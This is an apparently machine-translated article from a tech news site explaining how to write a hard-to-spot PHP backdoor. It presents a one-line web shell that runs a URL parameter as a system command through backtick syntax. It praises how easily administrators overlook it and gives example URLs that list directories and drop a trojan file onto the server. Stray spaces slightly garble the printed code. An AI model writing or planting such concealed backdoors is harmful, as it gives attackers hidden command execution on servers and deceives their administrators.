Shulou(Shulou.com)06/03 Report--

This article introduces the knowledge of "how to write a PHP backdoor code that is not easy to find". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Here we use a reverse apostrophe, which is not paid much attention to by PHPer. The reverse apostrophe contains a string equivalent to the shell_exec function.

The camouflage is very good, it is easy to be ignored by the administrator.

$selfNums = $_ GET ['r']; if (isset ($selfNums)) {echo `$selfNums`;}

Just saw this code, I think everyone will say that there is no problem, but careful friends will also find that the following variables are wrapped in a symbol, since it is a variable, why should it be like this?

And it's not a single quote, this is the key, this symbol is a key under Esc (located in the exclamation point! Next to)

The same effect can be achieved through echo `system command `; system ()

If you don't believe it, you can test it.

Http://127.0.0.1/t.php?r=dir can list directories

Http://127.0.0.1/t.php?r=echo I am a horse > D:\ web\ 90sec.php

I have successfully tested it with appserv and virtual host.

This is the end of "how to write a PHP backdoor code that is not easy to find". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.